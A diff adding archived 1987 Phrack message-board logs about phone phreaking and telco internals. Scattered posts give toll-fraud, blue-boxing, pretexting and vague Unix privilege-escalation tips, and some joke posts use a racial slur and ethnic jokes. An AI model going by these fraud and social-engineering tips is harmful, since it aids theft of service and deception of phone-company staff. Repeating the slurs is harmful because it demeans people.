+  For those of you who have problems with the acronyms posted here, you might
+want to check the N)eed acronyms option from the main menu on this board. This
+is an acronym list that I made a while back and gave to TK, and he put a few
+in himself. It's basically correct as far as I know, so please let's not add
+one unless you are sure.
+
+Phantom
+
+
+
+
+
+49/70: Carot, etc.
+Name: Doom Prophet 21
+Date: 4:41 pm  Fri May 15, 1987
+
+Well, I don't know that much about FACS, although I don't believe that it
+really acts as a replacement for COSMOS, more like an integration/mini datakit
+sort of thing for the different systems related to cosmos.
+
+Mad Hatter was asking about CAROT in mail, and I looked through some stuff and
+here is some info about the system. It consists of the two processors for the
+CAROT (database section), the data and the test processor. The TP controls and
+directs the ROTL's and the Circuit Maintenance System (I've seen CMS-1B and
+also CMS-3A, don't know what the current version is). CMS 3A is used with
+TIRKS also. Anyway, the CAROT controller (which is supported by the two
+processors) can do something like 14 tests at the same time (at night when
+their is less traffic on the trunks). The CC also analyzes and sends out the
+test results to the appropriate departments or offices (the CO, an SCC or a
+CTTU station). The ROTL is accessed just by the technician dialing it, which
+is why anyone can dial them. The ROTL is controlled by MF input of the trunk
+group and network numbers. I have seen TNN's as being three digits,  but I
+guess it depends upon the office size. The ROTL seizes the trunk to be tested.
+The ATMS responder (Automated Trunk Measurement System) is connected to the
+ends of the tested trunk to receive tthe test measurements. The ROTL somehow
+attaches test equipment to the origiinating end of the trunk. Other test lins
+are used for the terminating end (going into another CO or switch)...I'm sure
+everyone knows there are dialups to CAROT, these are from the Remote User
+Multiplex, the ports for remote terminals to call in through (unless the
+dialup serves for some type of diagnostics testing upon the test equimpment
+itself). 16 people can be on the same RUM....I don't know if that means 16
+people can dial the same dialup and somehow still connect (highly improbable).
+Lex would probably know more about it.
+
+Doom
+
+
+
+
+50/70: Advanced 800
+Name: Taran King 1
+Date: 5:00 pm  Fri May 15, 1987
+
+Well, I know that many people have been told that to get translations for 800
+numbers, they should call an office that has access to the NCP database.  I
+just read a bit about it in CO which I thought was sort of interesting.  It's
+part of DSDC (Direct Services Dialing Capabilities).  The subscriber dials the
+800 number which is then routed to a 4E.  From there, it goes to the ACP
+(Action Control Point or is it ACtion Point?|) which is software that
+determines the special type of call (toll free/976/etc.).  The ACP gets it's
+(its) information from the NCP which is the Network Control Point.  The NCP
+database receives the call information through CCS and checks on the customer
+service information that the call information goes with, thereby determining
+how to route the call and sends the info back to the ACP.  The SMS (Service
+Management System) is used to update information and for definition of that
+information.  The NCP database can contain various information such as where
+the translation routes determined by origin of call or time of day too.
+
+I have a question about CCS.  What is signifigant about the number version? I
+mean, is the information transmitted done differently (different protocol or
+manner of sending) or is it just updates to the way it's wired up?  McBlah
+-TK
+
+
+
+
+51/70: CCS
+Name: Mad Hatter 51
+Date: 6:02 pm  Fri May 15, 1987
+
+Randy- I can't seem to find that ancronym or any mention of it.  I've followed
+your post all they way up to that.  The Advanced 800 Service you read had to
+do with the SPC Network?  The paragraph you typed was the same(not word for
+word) as the one here in the Tech on SPC Net.  ACP stands for ACtion Point.
+
+-Hatter
+
+Excuse the time/date of this call..
+
+
+
+
+52/70: CCS
+Name: Taran King 1
+Date: 11:05 pm  Fri May 15, 1987
+
+The CCS that I mentioned (CCS7 presently) is like the modern term for CCIS.
+I'm not sure why they changed it, but that's the accepted acronym now.  The
+information that I got from CO magazine was discussing the BOCs' involvement
+in 800 services now.  It's highly possible (and probable) that they use the
+same method of signaling for this.  Hmm...Oh well, still, I want to know about
+the different versions of CCS.  Later
+-TK
+
+
+
+53/70: CCS
+Name: Phantom Phreaker 46
+Date: 12:52 pm  Sat May 16, 1987
+
+   Ok, the international version of CCS is known as as CCITT6, (or 'the CCITT
+signalling system No. 6) which are centered around an International Switching
+Center (ISC). CCITT No. 6 can identify 2048 trunks (CCS can ID 8192 trunks).
+
+
+   I have some pages from an old BSTJ on CCIS in front of me, they have a good
+amount of information about CCITT6 in here. One interesting table inn here is
+Calling parties categries, which are in bits 13-16 of a CCITT No. 6 'message',
+there are provisions for operators in French, English, German, Russian, and
+Spanish, and other user selectable languages, data call, test call, spare,
+etc. I'll have to read more about this, it would be interesting to find out
+how you could make an int'l call over CCITT No. 6 (or maybe 7 now as someone
+said) as a test call.
+
+Phantom
+
+
+
+
+54/70: Badgers...
+Name: Taran King 1
+Date: 7:38 pm  Sat May 16, 1987
+
+A long, long time ago, Jester Sluggo found some stuff about Badgers while
+trashing.  Just today, in conversation, I found out a bit about what these
+are.  It is a piece of machinery (Badger is the brand name) which is located
+in the SCC (supposedly).  It is used for remote trunk testing and it grabs the
+circuit to be tested and runs whatever on it.  I have a feeling this is more
+for the independant telcos but I couldn't say for sure.  Later
+-TK
+
+
+
+
+55/70: Here's......
+Name: The Disk Jockey 13
+Date: 12:40 am  Mon May 18, 1987
+
+..an employee numthat I guess is sort of a Sprint Newsline.
+
+It was LEECHED off of another board, so it remains ted: 8-332-0111
+
+
+
+
+
+56/70: Anyone know?
+Name: Cap'N Crax 10
+Date: 2:22 am  Mon May 18, 1987
+
+Does anyone know if either/both 900's and 976's terminate in POTS number?
+(Ever?)  Something tells me that they probably do..
+
+C^2
+
+
+
+57/70: 976/900s
+Name: Taran King 1
+Date: 6:35 am  Mon May 18, 1987
+
+I believe that I asked someone that already and neither of them did.  They
+both were arranged really strangely and didn't have POTS numbers (or at least
+not standard POTS numbers).  If you could log onto the switch for the 900 or
+976 number, you could probably find out, anyway, if it's got a POTS
+translation, but then again, that's a whole different baby.  I'll ask again
+and repost when I find out unless Phantom and DP beat me to it (likely). Later
+-TK
+
+
+
+
+58/70: 900 and 976
+Name: Kerrang Khan 34
+Date: 4:37 pm  Mon May 18, 1987
+
+Do not terminate in POTS numbers.
+  k
+
+
+
+59/70: I think..
+Name: Slave Driver 58
+Date: 10:21 am  Tue May 19, 1987
+
+
+ that 900s as in the kind you see on TV, like voting things| terminate in a
+4e office.  There is some special device that totals the calls if needed| and
+then the people who are using it just call and ask about the numbers...
+
+Steve
+
+
+
+
+
+60/70: 900 numbers explained
+Name: Phantom Phreaker 46
+Date: 9:35 pm  Tue May 19, 1987
+
+   I was really interested in how 900 numbers worked, it is not common phreak
+knowledge, so I researched via a BSTJ and a little bit of engineering.
+Actually, I wrote a file on the Mass Announcement System (MAS) that is  about
+80 sectors, but I never released it because I thought no one gave a fuck. If
+anyone here wants this file, mail me and I'll get it to you somehow, or upload
+it here.
+
+   900 numbers do terminate in a Number 4 ESS, the 4E that has been allocated
+as your MAS node. As of 1980 (old info, I know) there were 7 No. 4 ESS
+switches that were MAS nodes. That number might be more now, butt the nodes
+were in Atlanta, Chicago, Dallas, Denver, LA, Newar,  and Philly. Each one of
+these covers a particular part of the country. (oops, that 'Newar' up there is
+supposed to be 'Newark'). For instance, if Randy dialed 1-900-555-1212 (the
+Dial it 900 service information line) his call would be sent to the Atlanta
+No. 4 ESS MAS node. If Mad Hatter dialed the same number, his call would be
+sent to the Philly MAS node. (Oh, Alaska and Hawaii are also included in
+this).
+
+  Back to the original question by Crax, 900 numbers can terminate in a POTS
+number, but I have never seen it done, so I would guess that it's not a common
+occurance. This is called cut through calling, or technically, Media
+Stimulated Calling (MSC). MSC basically sends one call per some unit of time
+to a DDD number.
+
+  The place that handles the maintenance and administration of all No. 4 ESS
+MAS offices is called ONAC, Operations Network Administration Center. I think
+the ODAC are centralized in Kansas City, Mo, which seems kind of strange
+because there isn't a MAS node there (that I know of).
+
+  One interesting thing about MAS services is the way Recent Changes are done,
+through an RCRRT2 (Remote Recent Change, don't ask me why the acronym doesn't
+match) channel, which is hardwired to ONAC. If one ever trashed ONAC or a 4E
+MAS node, you could probably find some actual switch output messages. Those
+would be interesting to see. So if anyone ever does any trashing like this
+then let me know.
+
+Phantom
+
+
+
+
+
+61/70: UNIX logs...
+Name: Ax Murderer 7
+Date: 5:33 pm  Wed May 20, 1987
+
+I haven't been on for awhile, but anyways, whoever was questioning UNIX's,
+which log are you talking about, the one of Berkley (HIST?). There's quite
+a few logs. To get superuser privs on some systems, first go into the /dev/
+section and scan through the files. Almost always there will be a program
+in there which will be UNPROTECTED and allow even the lowest scum to use
+it. The main point is, in case for some emergency reason, he must log on
+from a remote location, and has difficulties, he may process another account.
+
+ Ax Murderer
+
+Also, I got TONS of "C" programs. I also am pretty fluent in this.
+
+
+
+62/70: Unix
+Name: Phantom Phreaker 46
+Date: 9:02 pm  Fri May 22, 1987
+
+  Does anyone know a way to implement something similar to some common unix
+commands on a cosnix OS? For instance, the grep command, the find comma the
+file command, and a few others. What I wanted to do was list the ascii files
+in a cosnix directory (assume the /usr/cosmos directory, where COSMOS three
+letter command source is kept, but there couldcii or English Text in it). I
+would do it like this on unix:
+
+$ ls -a</tmp/asciick&
+
+ Then when that process was done:
+
+$ grep ascii /tmp/asciic/tmp/final&
+
+ Then check that file when it was done and it would have a listing of the
+ascii files. Since you cuse the type command, and can't use file, I'd rather
+not look through a long directory listing, and even then it's ot always ascii.
+So does anyone have any shell scripts that might help me out?
+
+Phantom
+
+
+PS-Sorry for the line noise.
+
+
+
+63/70: RA1 Channel 6
+Name: Icarus 15
+Date: 3:54 am  Sun May 24, 1987
+
+I dialed 1074654 and I heard "RA1 channel 6" repeated 8 times.  Then I found
+out that I could dial 107xxxx and get the recording.  Does anyone know what
+that means?
+
+This only worked on some phones.  Others, after I dialed 10, I would get the
+operator.
+
+Icarus
+
+
+
+
+64/70: PHREE CALLZ D00DZ
+Name: The Leftist 71
+Date: 10:57 pm  Sun May 24, 1987
+
+heh, about the easiest way to bill 3rd party or collect is to call spri nt
+operator.. they are dumb, and have no info on you whatsoever.. but you knew
+that didnt you??
+
+
+
+
+65/70: centrex
+Name: The Leftist 71
+Date: 4:52 pm  Mon May 25, 1987
+
+Is there anyone that has any good info, <bell manuals etc..> on Centrex, or
+maybe someone out there knows a few things about it that could post?? Centrex
+in the home is pretty nice thing to have..only costs about 10 bucks to have it
+installed, but its well worth it... more info later..
+
+
+
+
+
+66/70: WELL...
+Name: Sir Francis Drake 56
+Date: 7:05 pm  Mon May 25, 1987
+
+I HAVE SOME NON TECH CENTREX MANUALS SOMEWHERE...
+
+I dont think its all that great right now but when the RBOC's are allowed to
+do all their software stuff it will be pretty cool.  There are allread some
+keen centrex packages for voice mail and stuff.
+
+Ill go look for them.
+
+
+sfd
+
+
+
+
+67/70: Centrex
+Name: Phantom Phreaker 46
+Date: 5:59 pm  Sat May 30, 1987
+
+  Leftist, what do you want to know about centrex? I know a bit about the
+workings of them, the general description, how they are set up in a CO, etc.
+Be more specific in your question...
+
+Phantom
+
+
+
+68/70: Blue boxing
+Name: Icarus 15
+Date: 3:28 am  Sun May 31, 1987
+
+I have found that kp and st are not necessary when dialing off of a trunk.
+After seizing the trunk, ac+ is all that is needed to call out.  This seems
+strange.  Any comments?
+
+Icarus
+
+
+
+
+69/70: Reply^
+Name: The Executioner 19
+Date: 4:15 pm  Sun May 31, 1987
+
+You are not seizing an interoffice trunk.
+
+What you are doing is kind of pseudo-boxing, which is what we used to do
+here in New Jersey. What would happen is that we would use MCI, get a
+destination and then blow 2600. Since there were no restrictions on the
+band width, and no filters, we would blow back a dial tone that was possible
+to make international as well as alliance calls with crystal clarity.
+
+I don't know the exact name of this but just that we weren't
+seizing a trunk.
+
+Ex y
+  ^ nice space
+
+
+
+
+70/70: DP Boxing
+Name: Phantom Phreaker 46
+Date: 8:41 am  Mon Jun 01, 1987
+
+  Icarus, what you are talking about sounds like boxing using a DP (Dial
+Pulse) trunk. DP 'boxing' doesn't use KP and ST, they use a time-out feature.
+DP is made up of short bursts of 2600Hz tone. It isn't all that common as far
+as I know, but some older SxS offices supposedly use it for outpulsing on
+interoffice calls and to CAMA for billing. This means that either the homing
+CAMA office can record dial pulse trunk signalling, or there is some sort of
+sensor to translate it to MF before reception by the CAMA MF digit recievers.
+
+Phantom
+
+
+
+
+Post on Phreak/Hack Sub? No
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/8.txt b/phrack20/8.txt
new file mode 100644
index 0000000..8baaf79
--- /dev/null
+++ b/phrack20/8.txt
@@ -0,0 +1,593 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 8 of 12
+
+
+                  Metal Shop Private's -- Social Engineering
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This was a subboard similar to the Phreak/Hack Sub but it concerned the art of
+social engineering or bullshitting to get information.
+
+
+1/27: CAROT/RC-MAC
+Name: Phantom Phreaker 46
+Date: 2:46 am  Sun Apr 26, 1987
+
+  The numbers before/after CAROT are the generic and version.. for instance
+2CAROT3 is CAROT 2, generic 3. The highest I have seen is 2CAROT4, but there
+are probably more. Also a number that refers to a CAROT system could also be
+it's particular number, if there is more than one in a particular area.
+
+  RC-MAC (Recent Change Memory Administration Center) is a place where a clerk
+enters information into an electronic switching system via a Recent Change
+terminal. The information changed can be a variety of things, but things like
+Class of Service, CCF's, EA Interlata Carriers (called a PIC, Primary
+Independent Carrier, I believe, something along those lines), etc. Data that
+is to perform Recent Changes upon an ESS switch is screened by a computer
+system called RMAS (Remote Memory Administration System) for validity. RMAS is
+generally running under a unix OS.
+
+
+ A few actual Recent Changes look something like this:
+
+RC:LINE;CHG:
+ORD XXXXXXX
+TRC
+!
+
+ That is an RC upon a line, to change something. The TRC is TRaCe, I think,
+and the ! is needed for some reason.
+ You can also have:
+
+RC:MLHG;CHG: (RC upon a Multi Line Hunt Group); RC:MPTY;TWPTY: (RC upon a
+Multi Party line, a 2 party line)
+
+ Oh yeah, those examples I typed in might be wrong, I don't memorize them or
+anything so don't sue me if they aren't right. Also they are for a 1AESS.
+
+Phantom
+
+
+
+
+
+2/27: Bah..
+Name: Phantom Phreaker 46
+Date: 2:54 am  Sun Apr 26, 1987
+
+ (Sorry to post two in a row...)
+
+Hatter, RC-MAC does have COSMOS access, at least they have a login prefix
+assigned as 'RECENT CHANGE', which is RCxx, where the xx is two numbers. Theyy
+don't seem to logged on that often though. Some other systems they may have
+access to include RC/V, Recent Change annd Verify, I don't understand RC/V
+that much, but RC/V has channels into electronic offices, just like RC
+channels. RMAS is access to an RC channel.
+
+ PS-I'm open for corrections..I'm not 100% sure about all this shit either.
+
+Phantom
+
+
+
+
+3/27: Bell Security
+Name: Knight Lightning 
+Date: 7:14 pm  Thu Apr 30, 1987
+
+What would you have to do and who would you have to call and what would you
+have to say etc to find out about anything being on your line that you didn't
+want (hint hint)?
+
+:Knight Lightning
+
+
+
+
+4/27: (3232232
+Name: Doom Prophet 21
+Date: 4:57 pm  Fri May 01, 1987
+
+Try your CO (they would know if a DNR was there of course), or for CLID marked
+numbers, your SCC switch controller. They won't always read you the CT06
+though (heh)..
+
+
+
+
+
+5/27: Yeah but
+Name: Knight Lightning 2
+Date: 10:17 am  Sat May 02, 1987
+
+Who would you say that you are, why would you be calling, and what would you
+ask to find out if it was there?
+
+:Knight Lightning
+
+
+
+
+6/27: RC-MAC
+Name: Mad Hatter 51
+Date: 3:12 pm  Wed May 06, 1987
+
+RC-MAC.. are they any good for engineering?  If so, for what?  Thanks... Also,
+what are the functions of MMOC?
+
+-Hatter
+
+
+
+
+7/27: RC-MAC
+Name: Taran King 1
+Date: 5:58 pm  Wed May 06, 1987
+
+The Recent Change Memory Administration Center is the place at which orders
+are put in to do changes to subscriber lines, etc.  It is a very useful
+office, but this all depends on what you want to get done.  I believe they
+have access to RC terminals (makes sense anyway...) so you could get then to
+complete any RC transaction that you wished to have done provided that you've
+got a good excuse.  Hope that helps a bit..
+-TK
+
+
+
+
+8/27: CT reports
+Name: Control C 8
+Date: 9:07 pm  Wed May 06, 1987
+
+Here's something you may be intrested in:
+
+Report   Reason for Report
+------   -----------------
+CT01     To print information pertaining to a line trace requested by an input
+         message.
+
+CT02     To indicate that this message contains information pertaining to a
+         line trace requested by an input message.
+
+CT03     To indicate that an interoffice or outgoing seven-digit call has been
+         placed form a directory number to another directory number.
+
+CT04     To indicate that the incoming call has been placed to the indicated
+         directory number from a trunk.  The trunk network number (TNN) is
+         given.  Translation information for the called directory number or
+         the terminating directory number indicated that a trace should be
+         made of all calls to this number.
+
+CT05     Indicates thatan outgoing ten digit call has been placed from
+         directory number to another directory number.  A check of the
+         Calling Line Identification (CLID) list indicates that a trace of
+         all calls to this ten-digit number should be made.
+
+CT06     To print the contents of the CLID list in response to input message
+         CI-LIST or as the result of an error being detected in a CLID entry
+         by audit 32. The audit will remove the directory number in which the
+         error was found.  If CLID list in printed in responce to a TTY
+         message, then it will be a priority of SCHED and an 'A' will print
+         out with the header.  If CLID list is printed as a result of an error
+         found by the audit an 'M' will print out with the header since it
+         will be a priority of MAN.
+
+If anyone want to know any other output reports let me know..
+
+Control
+
+
+
+
+9/27: SCCS
+Name: Mad Hatter 51
+Date: 11:18 am  Thu May 07, 1987
+
+What is the difference between SCCS and TSPS SCCS?  Is it that TSPS SCCS is
+used by TSPS only?  That sounds logical, but I wasn't sure anyway.  Anyone
+ever hear of Network Administration?  What are they good(used) for?
+
+Questions, questions, questions....
+
+-Hatter
+
+
+
+
+10/27: NAC/CT0X reports
+Name: Phantom Phreaker 46
+Date: 10:58 pm  Thu May 07, 1987
+
+  Network Administration is also known as the NAC, Network Administration
+Center, also called Dial Assignment. They are located in the BOC building, I
+believe, along with the LAC (Loop Assignment Center) and SSC (Special Service
+Center) and a few others. The NAC basically deal with new lines being put in,
+they do things like figure out how to evenly distribute the number of lines so
+there won't be any shortage, and things like that, it's similar to the LAC but
+I don't know any big differences in the two right now.
+
+  Ctrl C, where did you get the CT0X message summaries? Pretty good info
+though, but I can say that I have only seen a CT06 (when I pulled it up), a
+CT04, and a CT03 message. CT04 ID's a TNN (as he said) connected through the
+destination ESS to a particular DN. It can then be determined the general area
+of where the call is coming from from the TNN. But there is differences if you
+are calling over interoffice trunks (local calls) or tandem trunks, or long
+haul, or inter-LATA...
+
+Phantom
+
+
+
+
+
+11/27: Offices, systems
+Name: Doom Prophet 21
+Date: 5:21 pm  Tue May 12, 1987
+
+Ok, for all you D00ds, here's some really hot classified information on Telco
+offices and the systems they use for maitenance functions. If you run into a
+problem engineering, simply say you are from any of the following offices. I
+will go into a brief description of each below. Enjoy!
+
+
+FUCK-Facilities Utilization Control Kitchen. A really hot office. They keep
+backups of all systems per a LATA, or in special cases, the entire BOC area,
+along with user logs and passwords. They use the CUNTLICK system to interface
+with SHIT, explained momentarily. They ar difficult to reach as no one knows
+their number, and anyone calling it has to enter a special queue dispenser
+where he enters routing information to reach the FUCK ACD. The FUCK
+technicians answer as normal subscribers and you have to tell them a codeword.
+
+PENIS-Plant Engineering Network Information System. Used by the PMS to deal
+with outside plant details and layout maps.
+
+CUNTLICK-Computer Utilities Network In the Control Kitchen. Used to sensor
+with SHIT.
+
+SHIT-Supreme Hardware Inventory Totals. Self explanatory.
+
+CRAP-Customer Repair Analysis Service. They use PENIS to supply PMS with info.
+
+PISS-Primary Intertoll Switching Servicemen. Corrdinate classes 1 through 4
+toll offices and monitor the STP's.
+
+BITCH-Building Installation Table Channel. Used by SHIT technicians to obtain
+new switch and office status.
+
+SCAB-Switching Cable Analysis  Burea. They work with PMS for trunk testing and
+maintenance. The systems they use are FART and DOPAMINE.
+
+Well, that's about all! Oh, don't forget BASTARD (Box Accessible System To Aid
+Real D00ds).  A special in band NPA with full OSC support for blue boxers to
+experiment within legally (only operating in special areas).
+
+That's all! Hope it helped!!!1
+
+
+
+
+
+12/27: MORE!!
+Filename: c:msgs\A-26730.1
+Name: Phantom Phreaker 46
+Date: 7:29 pm  Tue May 12, 1987
+
+ You forgot a few:
+
+DOGSHIT-Division Operations Group SHIT (see above post). DOGSHIT is like SHIT,
+except that DOGSHIT is in a division.
+
+CATPISS-Centralized Automatic Tandem Priorities Interexchange Support System.
+Self-explanitory.
+
+BEER-Bell Electrical Engineering Research
+
+COOL-Computerized Operations On Loops
+
+ Ah well, mine weren't near as good but at least I tried.
+
+Phantom
+
+
+
+
+
+13/27: Yet still more...
+Name: Taran King 1
+Date: 8:58 pm  Tue May 12, 1987
+
+Hey now, hey now, that was sheer incompetence...leaving out the following!
+
+BOOGER - Bell Operational Office for Generation of ESS Reports.  Self
+Explanitory
+
+STAN - Spanish Tacos And Nachos.  This support group, Californian based,
+maintains food services for all superior employees (all employees).
+
+NATE - Nacho And Taco Emissary.  This department secretly interfaces STAN with
+the rest of the network due to the STAN group's inability to fit in with
+society.  **Due to divestiture, NATE and STAN are no longer part of the
+network**
+
+IL DUCE - Not an acronym, but the janitorial services department of the
+network.
+
+PUMPKIN - Peripheral Unit Modulator Phor Kitchen Installations of NATE.  This
+group is in charge of interfacing kitchen activities through Project Genesis.
+See RAPE.
+
+BRRR-RING - The official word for the sound an AT&T phone makes receiving an
+incoming call.
+
+BANANA - Basic Analog Network Analog Network Analog (No wonder they went
+digital!!!).
+
+RAPE - Red Afro-PUMPKIN Enthusiast.  This group, led by Peter, cheers IL DUCE
+while he sweeps the floors.
+
+SCOOP - Secondary Command Output Only Procedure.  This converts all text to
+lower case.  It is a function used in most Bell computers along with LEX.
+
+LEX - Lengthy Explanitory Xlations.  This program, found alongside SCOOP,
+converts all lowercase text, from SCOOP, into upper case and 40 columns
+surrounded by "$"s.
+
+** Warning!  Never leave SCOOP and LEX running simultaneously or you will
+surely cause L666 to occur. **
+
+L666 - The warning message generated by computers indicating endless Loops of
+conflicting jobs.  This also indicates that everything is fucked.  See LOKI.
+
+LOKI - Life Over-Kill Inscentive.  If you find this error message on your
+computer, do not reboot the computer, but be sure to reboot something (HINT
+HINT!).
+
+
+This is a work of fiction.  Names, characters, places and identities are
+either products of the author's imagination or are used ficticiously.  If you
+notice any resemblence to actual events or persons, living or dead, don't come
+to us.
+
+Bill and Taran
+Feeling obnoxious
+Feeling 7-UP
+Banana flavored
+Using the Randy-Voice-Machine (Ha ha!)
+P.S.  Bill says, "Hi" to his Uncle Al.
+
+
+
+
+14/27: Who Could Forget......
+Filename: c:msgs\A-26724.1
+Name: The Disk Jockey 13
+Date: 7:10 am  Wed May 13, 1987
+
+SNATCH-Senses Nodes And Traps Code Hackers
+TITS-Telephone Involved in Tandom Skipping
+PUBIC-Plastered Uniforms Brought Inside Co......an employee infraction
+RAD-Recieve Ananlog Department
+DISC-Deadbeats Instinctively Scanning for Carriers
+LAP-Local Area Payphone
+
+Or use the codewords that Linemen and Telco employees use....
+
+This                         Means This
+--------                     -----------------
+"OHFUCKNIGS"            "I'm trapped in a phone booth in a black neighborhood"
+"FIDOFUCK"              "A customer's pet dog has me trapped up a pole"
+"HOMEBONE"              "I got laid while doing a customer's installation"
+"SNOOZEBOX"        "I'm sleeping, bust saying I'm fixing little green boxes"
+
+
+
+The list goes on......
+
+
+
+
+
+15/27: Phrack 15
+Name: Knight Lightning 2
+Date: 5:42 pm  Wed May 13, 1987
+
+Looks to me that between the multitude of humorous posts on subs 2 and 4 we
+need another Phrack joke issue.
+
+:Knight Lightning
+
+
+
+
+16/27: Where were these when?
+Name: Mad Hatter 51
+Date: 6:11 am  Fri May 15, 1987
+
+Where were these ancronyms when Phrack 13 was out?  None the less, I'm only
+posting this to say "Banana" to Bill...
+
+
+-Hatter
+
+
+God damn line noise!
+
+One more thing, don't expect to talk to me voice for a while(week), I "had an
+accident", and the result was  6 stitches in my inner upper lip... Hiho..
+
+
+
+
+17/27: Ok
+Name: Doom Prophet 21
+Date: 4:49 pm  Fri May 15, 1987
+
+Howdy Dowdy, if you like them, buffer them and save them for a rainy day, or
+put them in a future issue (or a section of PWN to illustrate the great great
+users of MSP and our |ool senses of humor in a world full of manual brained
+users who try to out elite each other consantly for no real reason
+
+.
+
+^Forgot the period up there. The Chinese men would show worm movies out of
+their penises onto the wall, which really wasn't a wall, but a little girl who
+ would blow her nose and discover her horror at seeing specks of blood in her
+snot, and the TV screen would dance around the green bean on the couch, which
+was itself watching TV out of a reflection his eyes which were glassed over
+from toxic fumes emanatinng from his oven, which came from the TV antenna
+before it came out his ass at 5 am.
+
+>From blind eye sees all, sort of
+
+
+
+
+
+18/27: 800 Numbers....
+Filename: c:msgs\A-26685.1
+Name: The Mad Hacker 47
+Date: 10:57 pm  Fri May 15, 1987
+
+A Dumb Question:
+ Is there anyway that you can do anything to 800 numbers? I.e. MB's, etc.
+ Can you CNA an 800 Watts or do you have to locate their regular number(Should
+they have one). I ask this because Fallwell shoudl burn!
+
+                              The Mad Hacker
+
+
+
+
+19/27: 800's
+Name: Lucifer 666 43
+Date: 2:07 am  Sun May 17, 1987
+
+I imagine that you would have to get the POTS number from X-tended 800
+services and then get the SCC for the POTS... Maybe the 800 number could be
+taken down for a while or disconnected by getting the AT&T office that handles
+800 maintainence...
+
+L666
+
+
+
+
+20/27: 800`s
+Name: Phantom Phreaker
+46
+Date: 1:31 pm  Sun May 17, 1987
+
+   I don't know if I posted this or not, but not all 800 numbers terminate in
+a POTS number, some of them are in the format of (NPA)+1XX+XXXX, and these are
+the kind that are only dialable via the actual 800 number, or by someone using
+a blue box to trunk off a number within an NPA (toll office actually) that is
+subscribed to that 800 number. I had someone get me some translations once
+from a toll office in 617, you can get them by typing certain commands
+directly into the switch, something like:
+
+TEST-DSIG-INWATS-NPA NXX XXXX. ^D
+
+ That's not right, but it's close.
+
+Phantom
+
+PS-MSP is almost as messy as Randy says.
+
+
+
+
+
+21/27: Change numbers
+Name: Mad Hatter 51
+Date: 8:18 pm  Mon May 18, 1987
+
+Is it possible to change your number by engineering an office?  If so, which
+one?  My guess would be RC MAC, but then again, what do I know?
+
+Bell Techie
+
+
+
+
+22/27: Whats...
+Name: Slave Driver 58
+Date: 10:27 am  Tue May 19, 1987
+
+NSAC?
+
+Steve Driver
+
+stupid definitions welcome, but so is a real one...thanks..|
+
+
+
+
+
+23/27: NSAC...?
+Name: Phantom Phreaker 46
+Date: 9:38 pm  Tue May 19, 1987
+
+ Did you mean NESAC by any chance? I've never heard of NSAC but it probably
+exists, there are a bunch of telco offices that end in 'SAC' such as MSAC,
+ESAC, NESAC, and OSAC, and probably others I can't remember. I'll look around
+and see if I can find NSAC anywhere.
+
+Phantom
+
+
+
+
+
+24/27: Offices
+Name: Doom Prophet 21
+Date: 6:57 am  Fri May 22, 1987
+
+Well Phantom, OSAC isn't a Bell or AT&T office, it is a system for operator
+services support (I guess it stands for something like Operator Services
+Assistance Center). From there a person can get information for certain time
+periods on entire TSPS sites, such as how many calls were placed, etc,  and a
+traffic analysis for day or night reports. The CLLI code is listed with the
+report I believe.
+CMAC is similar to RC-MAC (or so I thought) because when I was trying to get
+an 800 translation, the PBX attendant at the RTM in 312 referred me to them.
+They then asked me what switch it was for (the Xlation) and apparently
+misundererstood my request (I guess they thought I was asking for a DN or
+trunk translation). MSAC is for installation and testing of WATS lines butt
+don't give out Xlations (policy by the sound of it although it was probably
+just me).  I have heard differently, soo I'm not sure on tht last one (MSAC's
+purpose, which I have been told NSAC does instead). Since 800's have gottenen
+'advanced' I suppose the  offices for testing could be on a national level,
+although MLT equipment when testing a number that has been reported as an 800
+somehow accesses the actual translation  or non standard BTN automatically.
+The A8FSC probably does WATS testing also, along with NASCAR (mainly used for
+traffic analysis from toll centers of 800 terminations to make sure the
+completion level is up to standard). TK, where is the ACP physically,  just in
+the 4E itself? Do you know how the NCP receives incoming messages (the same as
+an initial message on CCIS, or CCS) and in what format? Also, what data links
+run to and from the NCP? Hope someone can answer my questions..
+
+Doom
+
+
+
+
+
+25/27: Sorry
+Name: Doom Prophet 21
+Date: 7:02 am  Fri May 22, 1987
+
+To leave another post, but before anyone starts having a fit, I know the
+standard  places for obtaining Translations, so please don't leave a thousand
+corrections on how the RTM has nothing to do with Xlations (I agree). Acttualy
+it was someone at the RWC who referred me to CMAC and not the RTM, I can't
+remember clearly anyway.
+
+
+
+
+26/27: Shit...
+Name: Taran King 1
+Date: 7:10 am  Fri May 22, 1987
+
+I don't have further specifications on the NCP database accessed from the ACP
diff --git a/phrack20/9.txt b/phrack20/9.txt
new file mode 100644
index 0000000..7093703
--- /dev/null
+++ b/phrack20/9.txt
@@ -0,0 +1,580 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 9 of 12
+
+
+                       Metal Shop Private's -- New Users
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This was the New User subboard where people could apply for membership on Metal
+Shop Private as you will see in a number of places throughout this message
+base.  All messages were posted anonymously except by those applying (who
+didn't actually post their application but it was arranged that way).
+
+Note:  Not all of the signatures on the ends of messages are correct as will
+       be obvious at times, but not at others.
+
+
+1/46: A few jokes...
+Name: <<< Knight Lightning 2 >>>
+Date: 10:41 pm  Mon May 04, 1987
+
+Ok, please note, the characters portrayed here are fictional.
+
+Picture a bar full of phone phreaks.  Jester Sluggo walks in drunk.  He goes
+to the front and gets a beer.  He chugs it and looks at the people on the left
+side of the bar and says, "ALL OF YOU ON THIS SIDE OF THE BAR ARE
+MOTHERFUCKERS!  ANY OF YOU GOT A PROBLEM WITH THAT?"  "No not me they cried,
+not wanting to incure damage.  Sluggo chugs another beer and then looks up and
+says, "ALL OF YOU ON THE RIGHT SIDE OF THE BAR ARE COCKSUCKERS!  ANY OF YOU GOT
+A PROBLEM WITH THAT?"  "No not I,"they all cried.  Then suddenly a small
+figured mexican national stood up and started walking towards Sluggo.  "YOU
+GOT A PROBLEM WITH SOMETHING I SAID," he belched.  "No no senor, I was on the
+wrong side of the bar."
+
+                                 --> The Amazing Comic!
+
+
+2/46: Galactus's Application:
+Name: Galactus
+Date: 2:33 pm  Tue May 05, 1987
+
+
+APPLICATION OF -=GALACTUS=- FOR -=METAL SHOP=- MEMBERSHIP;
+
+1.AGE 21
+2.SEX M
+3.NUMBER OF YEARS HACKING:5
+4.NUMBER OF YEARS PHREAKING:2
+5.PHILES WRITTEN:
